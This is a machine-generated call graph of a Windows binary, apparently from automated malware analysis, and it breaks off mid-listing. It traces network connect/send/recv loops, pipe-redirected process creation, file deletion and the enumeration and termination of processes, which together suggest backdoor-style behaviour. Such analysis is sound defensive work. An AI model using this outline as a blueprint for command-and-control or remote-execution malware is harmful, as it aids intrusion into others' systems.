ed4290 8 API calls 10690->10691 10692 edcf34 10691->10692 10693 edd990 8 API calls 10692->10693 10694 edcfb2 10693->10694 10695 ec2f90 2 API calls 10694->10695 10696 edcfd0 10695->10696 10776 ee0d80 10696->10776 10698 edd029 10699 ed1bb0 2 API calls 10698->10699 10699->10650 10701 ed4290 8 API calls 10700->10701 10702 ee49e4 SetEvent 10701->10702 10702->10647 10879 ed08d0 10704->10879 10707 ee4df0 10708 ece100 8 API calls 10707->10708 10709 edccbf 10708->10709 10709->10661 10711 eeb51e 10710->10711 10712 ed66f0 8 API calls 10711->10712 10713 eeb5e9 10712->10713 10713->10676 10715 ece5ad 10714->10715 10716 ec2f90 2 API calls 10715->10716 10721 ece6cb 10715->10721 10717 ece689 10716->10717 10718 ecd530 9 API calls 10717->10718 10719 ece6a0 10718->10719 10720 ed1bb0 2 API calls 10719->10720 10720->10721 10722 ece77f 10721->10722 10723 ece7e1 10721->10723 10724 ec2f90 2 API calls 10722->10724 10727 ec2f90 2 API calls 10723->10727 10725 ece795 10724->10725 10726 ecd530 9 API calls 10725->10726 10728 ece7ac 10726->10728 10729 ece819 10727->10729 10730 ed1bb0 2 API calls 10728->10730 10887 eef500 10729->10887 10731 ece7c5 10730->10731 10731->10678 10734 ed1bb0 2 API calls 10735 ece893 10734->10735 10736 ece8bf 10735->10736 10737 ece9a8 10735->10737 10740 ec2f90 2 API calls 10736->10740 10899 edd820 10737->10899 10743 ece924 10740->10743 10741 ecea7f 10745 ee48d0 lstrlen 10741->10745 10742 ece9d6 10744 ec2f90 2 API calls 10742->10744 10747 ecd530 9 API calls 10743->10747 10746 ece9fb 10744->10746 10748 eceac3 10745->10748 10749 ecd530 9 API calls 10746->10749 10750 ece96c 10747->10750 10903 ecff90 10748->10903 10751 ecea36 10749->10751 10752 ed1bb0 2 API calls 10750->10752 10755 ed1bb0 2 API calls 10751->10755 10756 ece994 10752->10756 10757 ecea49 10755->10757 10756->10678 10757->10678 10760 ec2f90 2 API calls 10761 eceb9a 10760->10761 10762 ed1bb0 2 API calls 10761->10762 10763 ecebe8 10762->10763 10911 ecd500 lstrlen 10763->10911 10765 ecec14 10766 ed1d90 5 API calls 10765->10766 10767 ecec47 10766->10767 10912 ed8200 10767->10912 10771 eced7c 10771->10678 10773 edbf63 10772->10773 10774 ee4420 8 API calls 10773->10774 10775 edbf73 10774->10775 10775->10683 10777 ee0d9a 10776->10777 10778 ef08b0 GetSystemTimeAsFileTime 10777->10778 10779 ee0f04 10778->10779 11103 ecd500 lstrlen 10779->11103 10781 ee0f89 10781->10698 10783 ee110c 11105 ecd500 lstrlen 10783->11105 10785 ee0f6d 10785->10781 11104 ecd500 lstrlen 10785->11104 10786 ee2250 10786->10698 10787 ee111a 10787->10786 10788 ec2f90 2 API calls 10787->10788 10789 ee1195 10788->10789 10790 ecd530 9 API calls 10789->10790 10791 ee11c3 10790->10791 10792 ed1bb0 2 API calls 10791->10792 10793 ee11d5 10792->10793 10795 ec2f90 2 API calls 10793->10795 10822 ee134c 10793->10822 10794 ef01a0 9 API calls 10796 ee13d8 10794->10796 10797 ee1226 10795->10797 10798 ef1050 8 API calls 10796->10798 10799 eda810 9 API calls 10797->10799 10800 ee13e4 10798->10800 10802 ee1258 10799->10802 10801 ec2f90 2 API calls 10800->10801 10803 ee1422 10801->10803 10806 ed1bb0 2 API calls 10802->10806 10804 ef01a0 9 API calls 10803->10804 10805 ee144a 10804->10805 10807 ef1050 8 API calls 10805->10807 10809 ee1288 10806->10809 10808 ee1456 10807->10808 10810 ed1bb0 2 API calls 10808->10810 10811 eeb500 8 API calls 10809->10811 10809->10822 10812 ee1478 10810->10812 10813 ee12fa 10811->10813 10817 ef01a0 9 API calls 10812->10817 10814 ec2f90 2 API calls 10813->10814 10815 ee1310 10814->10815 10816 ecd530 9 API calls 10815->10816 10818 ee1328 10816->10818 10819 ee14e2 10817->10819 10820 ed1bb0 2 API calls 10818->10820 10821 ef1050 8 API calls 10819->10821 10820->10822 10823 ee14f1 10821->10823 10822->10794 10827 ec2f90 2 API calls 10823->10827 10862 ee16c2 10823->10862 10824 ec2f90 2 API calls 10825 ee1702 10824->10825 10826 ef01a0 9 API calls 10825->10826 10828 ee1728 10826->10828 10829 ee1595 10827->10829 10830 ef1050 8 API calls 10828->10830 10831 ef01a0 9 API calls 10829->10831 10832 ee1734 10830->10832 10833 ee15d0 10831->10833 10836 ed1bb0 2 API calls 10832->10836 10834 ef1050 8 API calls 10833->10834 10835 ee15df 10834->10835 10839 ec2f90 2 API calls 10835->10839 10837 ee174e 10836->10837 10838 ee1786 socket 10837->10838 10840 ef1050 8 API calls 10837->10840 10841 ee17de 10838->10841 10842 ee17b2 10838->10842 10843 ee1600 10839->10843 10840->10838 10844 ee17fb setsockopt 10841->10844 10845 ee18c4 gethostbyname 10841->10845 10842->10698 10846 ed1bb0 2 API calls 10843->10846 10847 ee1866 10844->10847 10845->10786 10849 ee18ed inet_ntoa inet_addr htons connect 10845->10849 10848 ee1628 10846->10848 10847->10845 10852 ef5820 wvsprintfA 10848->10852 10851 ee19ca 10849->10851 10854 ee19e0 10849->10854 10851->10698 10853 ee165e 10852->10853 10855 ed1bb0 2 API calls 10853->10855 10856 ee1a00 send 10854->10856 10857 ee167a 10855->10857 10861 ee1a1e 10856->10861 10858 ef01a0 9 API calls 10857->10858 10859 ee16b3 10858->10859 10860 ef1050 8 API calls 10859->10860 10860->10862 10863 edd990 8 API calls 10861->10863 10866 ee1a3e 10861->10866 10862->10824 10864 ee1add recv 10863->10864 10865 ee21ad closesocket 10864->10865 10878 ee1b57 10864->10878 10868 ee2210 10865->10868 10866->10698 10868->10786 10869 eeb500 8 API calls 10868->10869 10869->10786 10870 ed0110 8 API calls 10870->10878 10871 ed4290 8 API calls 10871->10878 10872 ee2135 recv 10873 ee2187 10872->10873 10872->10878 10873->10865 10874 ed1bb0 GetProcessHeap RtlFreeHeap 10874->10878 10876 ec2f90 GetProcessHeap RtlAllocateHeap 10876->10878 10877 eda810 9 API calls 10877->10878 10878->10865 10878->10870 10878->10871 10878->10872 10878->10873 10878->10874 10878->10876 10878->10877 11106 ec1df0 10878->11106 11110 ecc110 10878->11110 10880 ed08db 10879->10880 10883 ed7ed0 10880->10883 10884 ed7eec 10883->10884 10885 ee4420 8 API calls 10884->10885 10886 ec2f17 10885->10886 10886->10707 10889 eef5be 10887->10889 10888 ece83f 10888->10734 10889->10888 10936 ec21f0 10889->10936 10893 eef77d 10898 eef6bd 10893->10898 10946 eddcf0 10893->10946 10896 eef882 10954 ef0220 10896->10954 10966 ec2f20 10898->10966 10900 edd83c GetModuleFileNameA 10899->10900 10902 ece9cb 10900->10902 10902->10741 10902->10742 10904 ecffcb 10903->10904 10905 ed0920 8 API calls 10904->10905 10906 eceaeb 10904->10906 10905->10906 10907 ed7ff0 10906->10907 10910 ed8035 10907->10910 10908 eceb0c 10908->10760 10909 ecff90 8 API calls 10909->10910 10910->10908 10910->10909 10911->10765 10913 ed823e 10912->10913 10914 ed8465 CreatePipe 10913->10914 10915 ed8499 SetHandleInformation CreatePipe 10914->10915 10916 ed848a 10914->10916 10919 ed85cd SetHandleInformation 10915->10919 10920 ed858a 10915->10920 10918 edd990 8 API calls 10916->10918 10921 eced18 DeleteFileA 10916->10921 10918->10921 10924 ed860f 10919->10924 10922 ed87e3 CloseHandle 10920->10922 10921->10771 10922->10916 10923 ed87fd CloseHandle 10922->10923 10923->10916 10925 ed8719 CreateProcessA 10924->10925 10926 ed8777 10925->10926 10927 ed885c WriteFile 10926->10927 10929 ed8789 CloseHandle CloseHandle 10926->10929 10928 ed88dd CloseHandle CloseHandle 10927->10928 10927->10929 10931 ed893e 10928->10931 10929->10922 11095 ec23a0 10931->11095 10934 ed89e6 CloseHandle CloseHandle 10935 ed89b2 10935->10934 10937 ec221e 10936->10937 10938 ee3a80 4 API calls 10937->10938 10939 ec22ae 10938->10939 10940 ee8b60 4 API calls 10939->10940 10941 ec22d1 10939->10941 10940->10941 10941->10898 10942 ee8b60 10941->10942 10943 ee8b95 10942->10943 10944 ee3a80 4 API calls 10943->10944 10945 ee8be0 10944->10945 10945->10893 10947 eddd26 10946->10947 10969 ecbfa0 10947->10969 10951 eddd68 10981 ef0a90 10951->10981 10953 eddd93 10953->10896 10955 ef022d 10954->10955 10957 ef03d0 10955->10957 10993 ecc6b0 10955->10993 10957->10898 10958 ef0369 10958->10957 10960 ec2f90 2 API calls 10958->10960 10964 ef0613 10958->10964 10959 ec2f90 2 API calls 10965 ef05e4 10959->10965 10962 ef05c8 10960->10962 10961 ef0713 10961->10898 10963 ed1bb0 2 API calls 10962->10963 10962->10965 10963->10964 10964->10959 10964->10961 10965->10898 10967 ec1170 2 API calls 10966->10967 10968 ec2f63 10967->10968 10968->10888 10970 ecc008 10969->10970 10971 ec2f90 2 API calls 10970->10971 10972 ecc048 10971->10972 10973 ed1bb0 2 API calls 10972->10973 10974 ecc072 10973->10974 10975 ed4db0 10974->10975 10976 ed4dfc 10975->10976 10980 ed50de 10975->10980 10979 ed4f9c 10976->10979 10987 ee4ea0 10976->10987 10978 ee4ea0 4 API calls 10978->10979 10979->10978 10979->10980 10980->10951 10982 ef0ab6 10981->10982 10983 ed4db0 4 API calls 10982->10983 10984 ef0dd8 10983->10984 10985 ed4db0 4 API calls 10984->10985 10986 ef0e55 10985->10986 10986->10953 10988 ee4f16 10987->10988 10989 ec2f90 2 API calls 10988->10989 10990 ee5042 10989->10990 10991 ed1bb0 2 API calls 10990->10991 10992 ee53e8 10991->10992 10992->10979 10994 ecc6f6 10993->10994 10995 ec21f0 4 API calls 10994->10995 10997 ecc722 10995->10997 10996 ec1170 2 API calls 10998 ecc8d2 10996->10998 10999 ecc74d 10997->10999 11002 ecc79a 10997->11002 11004 ecc813 10997->11004 10998->10958 11000 ec1170 2 API calls 10999->11000 11001 ecc772 11000->11001 11001->10958 11005 ed30f0 11002->11005 11004->10996 11007 ed313f 11005->11007 11006 ed40b3 11006->11004 11007->11006 11008 ee3a80 4 API calls 11007->11008 11009 ed338d 11008->11009 11011 ee3a80 4 API calls 11009->11011 11037 ed3959 11009->11037 11010 ed4009 11012 ed403e 11010->11012 11013 ed404a 11010->11013 11014 ed33ef 11011->11014 11016 ec1170 2 API calls 11012->11016 11017 ec1170 2 API calls 11013->11017 11018 ee3a80 4 API calls 11014->11018 11014->11037 11015 ec1170 2 API calls 11015->11037 11019 ed4045 11016->11019 11017->11019 11020 ed343c 11018->11020 11019->11004 11021 ee8b60 4 API calls 11020->11021 11030 ed3469 11020->11030 11020->11037 11022 ed349c 11021->11022 11022->11037 11041 ef1190 11022->11041 11024 ed35d4 11026 ecad30 4 API calls 11024->11026 11025 ed35e7 11028 ed2c90 4 API calls 11025->11028 11031 ed35e2 11026->11031 11028->11031 11030->11024 11030->11025 11030->11037 11032 ed2c90 4 API calls 11031->11032 11033 ed363c 11032->11033 11034 ee3a80 4 API calls 11033->11034 11033->11037 11035 ed3750 11034->11035 11036 ed2c90 4 API calls 11035->11036 11035->11037 11039 ed3813 11036->11039 11037->11010 11037->11015 11038 ee3a80 4 API calls 11038->11039 11039->11037 11039->11038 11040 ed2c90 4 API calls 11039->11040 11040->11039 11042 ef11d8 11041->11042 11043 ee3a80 4 API calls 11042->11043 11044 ed34da 11042->11044 11043->11044 11044->11037 11045 ecad30 11044->11045 11046 ecad45 11045->11046 11053 edf160 11046->11053 11048 ecae1f 11048->11030 11049 ee0790 4 API calls 11050 ecad8b 11049->11050 11050->11048 11050->11049 11052 ecade7 11050->11052 11051 eeab60 4 API calls 11051->11052 11052->11048 11052->11051 11055 edf1b5 11053->11055 11054 edf1bc 11054->11050 11055->11054 11056 edf27a 11055->11056 11057 edf322 11055->11057 11058 edf2bb 11056->11058 11060 ee8b60 4 API calls 11056->11060 11059 ed2c90 4 API calls 11057->11059 11061 edf2f8 11058->11061 11063 ed2c90 4 API calls 11058->11063 11087 edf2eb 11058->11087 11062 edf392 11059->11062 11060->11058 11061->11050 11065 ed2c90 4 API calls 11062->11065 11062->11087 11063->11087 11064 ec1170 2 API calls 11066 ee0425 11064->11066 11067 edf3d9 11065->11067 11066->11050 11068 ee3a80 4 API calls 11067->11068 11067->11087 11069 edf440 11068->11069 11070 ee8b60 4 API calls 11069->11070 11069->11087 11071 edf461 11070->11071 11072 ee3a80 4 API calls 11071->11072 11071->11087 11073 edf485 11072->11073 11074 ee3a80 4 API calls 11073->11074 11073->11087 11075 edf4a7 11074->11075 11076 ef1190 4 API calls 11075->11076 11080 edf5fa 11075->11080 11075->11087 11077 edf5a0 11076->11077 11079 ef1190 4 API calls 11077->11079 11077->11087 11078 ef1190 4 API calls 11083 edf6df 11078->11083 11079->11080 11080->11078 11080->11087 11081 eeab60 4 API calls 11081->11083 11082 ee024a 11084 ed2c90 4 API calls 11082->11084 11085 ee0299 11082->11085 11083->11081 11089 edf7e0 11083->11089 11084->11085 11086 ed2c90 4 API calls 11085->11086 11085->11087 11086->11087 11087->11061 11087->11064 11088 ee8b60 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11088->11089 11089->11082 11089->11087 11089->11088 11090 ed8bf0 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11089->11090 11091 ef1190 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 11089->11091 11092 eeab60 4 API calls 11089->11092 11093 ed2c90 4 API calls 11089->11093 11094 ee0790 4 API calls 11089->11094 11090->11089 11091->11089 11092->11089 11093->11089 11094->11089 11096 ec23ad 11095->11096 11097 edd990 8 API calls 11096->11097 11098 ec23f2 ReadFile 11097->11098 11099 ec24c1 WaitForSingleObject 11098->11099 11100 ec2452 11098->11100 11099->10934 11099->10935 11100->11099 11101 ed4290 8 API calls 11100->11101 11102 ec247e ReadFile 11101->11102 11102->11099 11102->11100 11103->10785 11104->10783 11105->10787 11107 ec1e0f 11106->11107 11109 ec1e37 11106->11109 11108 ef08b0 GetSystemTimeAsFileTime 11107->11108 11108->11109 11109->10878 11111 ecc152 11110->11111 11112 ec2f90 2 API calls 11111->11112 11113 ecc193 11112->11113 11114 eda810 9 API calls 11113->11114 11115 ecc1d1 11114->11115 11116 ed1bb0 2 API calls 11115->11116 11118 ecc205 11116->11118 11117 ecc218 11117->10878 11118->11117 11119 ec2f90 2 API calls 11118->11119 11120 ecc245 11119->11120 11121 eda810 9 API calls 11120->11121 11122 ecc29b 11121->11122 11123 ed1bb0 2 API calls 11122->11123 11124 ecc2f8 11123->11124 11124->10878 11201 eeb3c0 11202 ed2a80 8 API calls 11201->11202 11203 eeb3d9 11202->11203 11204 ef1050 8 API calls 11203->11204 11205 eeb42e 11204->11205 11206 ee0fd8 11207 ee0fe0 11206->11207 11304 ecd500 lstrlen 11207->11304 11209 ee110c 11305 ecd500 lstrlen 11209->11305 11211 ee2250 11212 ee111a 11212->11211 11213 ec2f90 2 API calls 11212->11213 11214 ee1195 11213->11214 11215 ecd530 9 API calls 11214->11215 11216 ee11c3 11215->11216 11217 ed1bb0 2 API calls 11216->11217 11218 ee11d5 11217->11218 11220 ec2f90 2 API calls 11218->11220 11247 ee134c 11218->11247 11219 ef01a0 9 API calls 11221 ee13d8 11219->11221 11222 ee1226 11220->11222 11223 ef1050 8 API calls 11221->11223 11224 eda810 9 API calls 11222->11224 11225 ee13e4 11223->11225 11227 ee1258 11224->11227 11226 ec2f90 2 API calls 11225->11226 11228 ee1422 11226->11228 11231 ed1bb0 2 API calls 11227->11231 11229 ef01a0 9 API calls 11228->11229 11230 ee144a 11229->11230 11232 ef1050 8 API calls 11230->11232 11234 ee1288 11231->11234 11233 ee1456 11232->11233 11235 ed1bb0 2 API calls 11233->11235 11236 eeb500 8 API calls 11234->11236 11234->11247 11237 ee1478 11235->11237 11238 ee12fa 11236->11238 11242 ef01a0 9 API calls 11237->11242 11239 ec2f90 2 API calls 11238->11239 11240 ee1310 11239->11240 11241 ecd530 9 API calls 11240->11241 11243 ee1328 11241->11243 11244 ee14e2 11242->11244 11245 ed1bb0 2 API calls 11243->11245 11246 ef1050 8 API calls 11244->11246 11245->11247 11248 ee14f1 11246->11248 11247->11219 11252 ec2f90 2 API calls 11248->11252 11287 ee16c2 11248->11287 11249 ec2f90 2 API calls 11250 ee1702 11249->11250 11251 ef01a0 9 API calls 11250->11251 11253 ee1728 11251->11253 11254 ee1595 11252->11254 11255 ef1050 8 API calls 11253->11255 11256 ef01a0 9 API calls 11254->11256 11257 ee1734 11255->11257 11258 ee15d0 11256->11258 11261 ed1bb0 2 API calls 11257->11261 11259 ef1050 8 API calls 11258->11259 11260 ee15df 11259->11260 11264 ec2f90 2 API calls 11260->11264 11262 ee174e 11261->11262 11263 ee1786 socket 11262->11263 11265 ef1050 8 API calls 11262->11265 11266 ee17de 11263->11266 11267 ee17b2 11263->11267 11268 ee1600 11264->11268 11265->11263 11269 ee17fb setsockopt 11266->11269 11270 ee18c4 gethostbyname 11266->11270 11271 ed1bb0 2 API calls 11268->11271 11272 ee1866 11269->11272 11270->11211 11274 ee18ed inet_ntoa inet_addr htons connect 11270->11274 11273 ee1628 11271->11273 11272->11270 11277 ef5820 wvsprintfA 11273->11277 11276 ee19ca 11274->11276 11279 ee19e0 11274->11279 11278 ee165e 11277->11278 11280 ed1bb0 2 API calls 11278->11280 11281 ee1a00 send 11279->11281 11282 ee167a 11280->11282 11286 ee1a1e 11281->11286 11283 ef01a0 9 API calls 11282->11283 11284 ee16b3 11283->11284 11285 ef1050 8 API calls 11284->11285 11285->11287 11288 edd990 8 API calls 11286->11288 11291 ee1a3e 11286->11291 11287->11249 11289 ee1add recv 11288->11289 11290 ee21ad closesocket 11289->11290 11303 ee1b57 11289->11303 11293 ee2210 11290->11293 11292 ec1df0 GetSystemTimeAsFileTime 11292->11303 11293->11211 11294 eeb500 8 API calls 11293->11294 11294->11211 11295 ed0110 8 API calls 11295->11303 11296 ed4290 8 API calls 11296->11303 11297 eda810 9 API calls 11297->11303 11298 ee2135 recv 11299 ee2187 11298->11299 11298->11303 11299->11290 11300 ed1bb0 GetProcessHeap RtlFreeHeap 11300->11303 11301 ecc110 9 API calls 11301->11303 11302 ec2f90 GetProcessHeap RtlAllocateHeap 11302->11303 11303->11290 11303->11292 11303->11295 11303->11296 11303->11297 11303->11298 11303->11299 11303->11300 11303->11301 11303->11302 11304->11209 11305->11212 10356 edfcd7 10368 edf850 10356->10368 10357 ee8b60 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10357->10368 10360 ed8bf0 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10360->10368 10361 ef1190 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10361->10368 10364 ee024a 10365 ed2c90 4 API calls 10364->10365 10367 ee0299 10364->10367 10365->10367 10369 ed2c90 4 API calls 10367->10369 10370 ee0368 10367->10370 10368->10357 10368->10360 10368->10361 10368->10364 10368->10370 10371 eeab60 10368->10371 10381 ed2c90 10368->10381 10386 ee0790 10368->10386 10369->10370 10395 ec1170 10370->10395 10372 eeab77 10371->10372 10373 eead05 10372->10373 10374 eeabea 10372->10374 10408 eca850 10373->10408 10376 eeac6c 10374->10376 10377 eeac0c 10374->10377 10379 edd9a0 4 API calls 10376->10379 10399 edd9a0 10377->10399 10380 eeac21 10379->10380 10380->10368 10383 ed2cb9 10381->10383 10382 ed2ce0 10382->10368 10383->10382 10384 ee3a80 4 API calls 10383->10384 10385 ed2d76 10384->10385 10385->10368 10387 ee0a0d 10386->10387 10388 ee07cb 10386->10388 10389 eca850 4 API calls 10387->10389 10390 ee0926 10388->10390 10391 ee07e5 10388->10391 10394 ee0882 10389->10394 10392 edd9a0 4 API calls 10390->10392 10393 edd9a0 4 API calls 10391->10393 10392->10394 10393->10394 10394->10368 10396 ec119e 10395->10396 10397 ec1396 10396->10397 10398 ed2eb0 2 API calls 10396->10398 10398->10396 10402 edd9c5 10399->10402 10400 edda26 10400->10380 10401 ed2c90 4 API calls 10404 eddb90 10401->10404 10402->10400 10403 ed2c90 4 API calls 10402->10403 10405 eddadb 10402->10405 10403->10405 10406 ec1170 2 API calls 10404->10406 10405->10401 10405->10404 10407 eddc9f 10406->10407 10407->10380 10409 eca8dc 10408->10409 10410 ecaa1a 10409->10410 10411 ed2c90 4 API calls 10409->10411 10413 ecacfe 10410->10413 10416 ee3a80 10410->10416 10411->10410 10413->10380 10414 ee3a80 4 API calls 10415 ecaa81 10414->10415 10415->10413 10415->10414 10417 ee3ab7 10416->10417 10419 ee3ae7 10416->10419 10418 ece2c0 2 API calls 10417->10418 10420 ee3ade 10418->10420 10419->10415 10420->10419 10421 ed2eb0 2 API calls 10420->10421 10421->10419 10422 ec2cd0 10427 ed1cc0 10422->10427 10434 eeb450 10427->10434 10435 eeb46a 10434->10435 10436 ef00f0 8 API calls 10435->10436 10437 eeb49b 10436->10437 10442 ec28d0 10443 ec28e7 10442->10443 10445 ec2903 10442->10445 10444 ec2935 10445->10444 10446 ec29b4 10445->10446 10447 ec2a46 ReadFile 10445->10447 10448 ec2a61 10447->10448 10449 ecfed0 10450 ecfeeb 10449->10450 10451 ecbb70 8 API calls 10450->10451 10452 ecff10 10451->10452 10455 ee3080 10452->10455 10456 ee308e 10455->10456 10457 ed4290 8 API calls 10456->10457 10458 ecff27 10457->10458 11306 ecf9d0 11307 ecf9e6 11306->11307 11310 ee3c50 11307->11310 11309 ecfa49 11311 ee3c6f 11310->11311 11314 ece320 11311->11314 11313 ee3c86 11313->11309 11315 ece334 11314->11315 11316 ee3f00 8 API calls 11315->11316 11317 ece3ce 11316->11317 11317->11313 10459 ee0ad0 10462 ecb780 10459->10462 10465 edd750 10462->10465 10466 edd75a 10465->10466 10468 edd77e 10465->10468 10467 ed2eb0 2 API calls 10466->10467 10467->10468 10301 ee45a9 10302 ee45bd 10301->10302 10309 ee0610 10302->10309 10306 ee45ee 10307 ee4656 10306->10307 10308 ee4672 ExitProcess 10307->10308 10310 ee062b 10309->10310 10316 ecb690 10310->10316 10312 ee0660 10313 eefde0 10312->10313 10314 eefdf7 10313->10314 10315 eefe12 GetStdHandle GetStdHandle GetStdHandle 10313->10315 10314->10315 10315->10306 10317 ecb6b6 GetProcessHeap HeapAlloc 10316->10317 10317->10312 10469 eda0a6 10477 eda0b0 10469->10477 10470 ed6810 8 API calls 10470->10477 10471 eda5a1 10475 ed1bb0 2 API calls 10471->10475 10472 ed6810 8 API calls 10476 eda428 10472->10476 10473 ec1ca0 9 API calls 10473->10476 10474 ec1ca0 9 API calls 10474->10477 10478 eda606 10475->10478 10476->10471 10476->10472 10476->10473 10477->10470 10477->10474 10477->10476 11369 ecab27 11372 ecab30 11369->11372 11370 ecacfe 11371 ee3a80 4 API calls 11371->11372 11372->11370 11372->11371 11373 ec3520 11374 ec353f 11373->11374 11375 ed68d0 4 API calls 11374->11375 11376 ec355e 11374->11376 11375->11376 11318 edc9a0 11319 edc9be 11318->11319 11324 ecd500 lstrlen 11319->11324 11321 edc9fd 11325 ecdf70 11321->11325 11324->11321 11328 ee0b70 11325->11328 11327 ecdf8a 11329 ee0baf 11328->11329 11330 ee0c9b 11329->11330 11331 ee0ca8 11329->11331 11332 ed66f0 8 API calls 11330->11332 11333 ece320 8 API calls 11331->11333 11334 ee0ca6 11331->11334 11332->11334 11333->11334 11334->11327 10479 ee22a0 10480 ee22fb 10479->10480 10481 ef50e0 3 API calls 10480->10481 10482 ee247d 10481->10482 10483 ee9580 10 API calls 10482->10483 10484 ee24c2 10483->10484 10485 ece430 lstrlen 10484->10485 10486 ee24e6 10485->10486 10487 ec2f90 2 API calls 10486->10487 10488 ee2511 10487->10488 10489 ed1bb0 2 API calls 10488->10489 10491 ee2561 10489->10491 10490 ef08b0 GetSystemTimeAsFileTime 10490->10491 10491->10490 10492 edd990 8 API calls 10491->10492 10495 ed2120 5 API calls 10491->10495 10496 eefa80 3 API calls 10491->10496 10498 ed1200 12 API calls 10491->10498 10499 ee0d80 22 API calls 10491->10499 10500 ec2f90 GetProcessHeap RtlAllocateHeap 10491->10500 10501 ecd530 9 API calls 10491->10501 10502 ed1bb0 GetProcessHeap RtlFreeHeap 10491->10502 10503 ef1050 8 API calls 10491->10503 10504 ed2c30 8 API calls 10491->10504 10506 ecd760 51 API calls 10491->10506 10507 edd0f0 31 API calls 10491->10507 10508 ee4af0 10491->10508 10520 edc770 10491->10520 10493 ee2bec Sleep 10492->10493 10524 ed8cf0 10493->10524 10495->10491 10496->10491 10498->10491 10499->10491 10500->10491 10501->10491 10502->10491 10503->10491 10504->10491 10506->10491 10507->10491 10509 ee4b32 10508->10509 10510 ec2f90 2 API calls 10509->10510 10511 ee4b55 10510->10511 10512 ec2f90 2 API calls 10511->10512 10513 ee4b78 10512->10513 10531 ed71e0 10513->10531 10516 ed1bb0 2 API calls 10517 ee4bb0 10516->10517 10518 ed1bb0 2 API calls 10517->10518 10519 ee4bc5 10518->10519 10519->10491 10521 edc79b 10520->10521 10522 ed4290 8 API calls 10521->10522 10523 edc86a 10521->10523 10522->10523 10523->10491 10528 ed8d16 10524->10528 10525 ed8dca DeleteFileA 10525->10528 10526 ed8f44 10526->10491 10528->10525 10528->10526 10529 ed8ee8 10528->10529 10537 ec1c30 10528->10537 10529->10526 10542 ed7d40 10529->10542 10532 ed7202 10531->10532 10533 ec2f90 2 API calls 10532->10533 10534 ed7648 10533->10534 10535 ed1bb0 2 API calls 10534->10535 10536 ed7684 10535->10536 10536->10516 10546 ecf270 10537->10546 10539 ec1c6a 10550 edd720 10539->10550 10543 ed7d69 10542->10543 10545 ed7e27 10543->10545 10561 ecbba0 10543->10561 10545->10529 10547 ecf29a 10546->10547 10548 ed0110 8 API calls 10547->10548 10549 ecf2a2 10548->10549 10549->10539 10551 edd72e 10550->10551 10552 ec1c70 10551->10552 10554 ed2a80 10551->10554 10552->10528 10557 ece100 10554->10557 10556 ed2a8f 10556->10552 10558 ece111 10557->10558 10559 ec1000 8 API calls 10558->10559 10560 ece127 10559->10560 10560->10556 10564 ee30b0 10561->10564 10565 ee30e4 10564->10565 10568 ed66f0 10565->10568 10567 ecbbae 10567->10545 10569 ed670d 10568->10569 10570 ed0110 8 API calls 10569->10570 10571 ed6738 10570->10571 10571->10567 10576 ef4eb3 10577 ef4ec5 10576->10577 10579 ec7a04 132 API calls 10577->10579 10578 ef4ec9 10579->10578 11125 eca830 11128 edb720 11125->11128 11127 eca83f 11129 edb72e 11128->11129 11132 ecd500 lstrlen 11129->11132 11131 edb739 11131->11127 11132->11131 11377 ec1130 11378 ec114b 11377->11378 11379 ee4420 8 API calls 11378->11379 11380 ec115b 11379->11380 11381 ecf330 11384 ecd500 lstrlen 11381->11384 11383 ecf38f 11384->11383 11385 ecfb30 11386 ed2df0 8 API calls 11385->11386 11387 ecfb55 11386->11387 10580 ed7eb0 10581 ed7eba 10580->10581 10582 ed7ec0 10580->10582 10583 ed2eb0 2 API calls 10581->10583 10583->10582 11392 ecbd08 11397 ecbd10 11392->11397 11393 eca4e0 lstrlen 11393->11397 11394 ecbdbb OpenProcess 11395 ecbe02 TerminateProcess 11394->11395 11394->11397 11395->11397 11398 ecbe67 CloseHandle 11395->11398 11396 ecbedd Process32Next 11396->11397 11399 ecbf19 CloseHandle 11396->11399 11397->11393 11397->11394 11397->11396 11397->11398 11398->11397 11401 ecbf47 11399->11401 9387 ef4f8a 9388 ef4ec5 9387->9388 9391 ec7a04 9388->9391 9627 ed1bb0 9391->9627 9395 ec7a60 9396 ed1bb0 2 API calls 9395->9396 9397 ec7aa7 9396->9397 9398 ec2f90 2 API calls 9397->9398 9399 ec7b0e 9398->9399 9400 ed1bb0 2 API calls 9399->9400 9401 ec7b22 9400->9401 9402 ec2f90 2 API calls 9401->9402 9403 ec7bad 9402->9403 9404 ed1bb0 2 API calls 9403->9404 9405 ec7bc3 9404->9405 9406 ec2f90 2 API calls 9405->9406 9407 ec7c07 9406->9407 9408 ed1bb0 2 API calls 9407->9408 9409 ec7c7a 9408->9409 9410 ec2f90 2 API calls 9409->9410 9411 ec7cb7 9410->9411 9412 ed1bb0 2 API calls 9411->9412 9413 ec7d1b 9412->9413 9414 ec2f90 2 API calls 9413->9414 9415 ec7d90 9414->9415 9416 ed1bb0 2 API calls 9415->9416 9417 ec7da6 9416->9417 9418 ec2f90 2 API calls 9417->9418 9419 ec7dfc 9418->9419 9420 ed1bb0 2 API calls 9419->9420 9421 ec7e1a 9420->9421 9422 ec2f90 2 API calls 9421->9422 9423 ec7e73 9422->9423 9424 ed1bb0 2 API calls 9423->9424 9425 ec7e87 9424->9425 9426 ec2f90 2 API calls 9425->9426 9427 ec7ef1 9426->9427 9428 ed1bb0 2 API calls 9427->9428 9429 ec7f05 9428->9429 9430 ec2f90 2 API calls 9429->9430 9431 ec7f42 9430->9431 9432 ed1bb0 2 API calls 9431->9432 9433 ec7f62 9432->9433 9434 ec2f90 2 API calls 9433->9434 9435 ec7fe8 9434->9435 9436 ed1bb0 2 API calls 9435->9436 9437 ec8004 9436->9437 9438 ec2f90 2 API calls 9437->9438 9439 ec8093 9438->9439 9440 ed1bb0 2 API calls 9439->9440 9441 ec80a7 9440->9441 9442 ec2f90 2 API calls 9441->9442 9443 ec8106 9442->9443 9444 ed1bb0 2 API calls 9443->9444 9445 ec818f 9444->9445 9446 ec2f90 2 API calls 9445->9446 9447 ec81d1 9446->9447 9448 ed1bb0 2 API calls 9447->9448 9449 ec81eb 9448->9449 9450 ec2f90 2 API calls 9449->9450 9451 ec8230 9450->9451 9452 ed1bb0 2 API calls 9451->9452 9453 ec8268 9452->9453 9454 ed1bb0 2 API calls 9453->9454 9455 ec82b6 9454->9455 9635 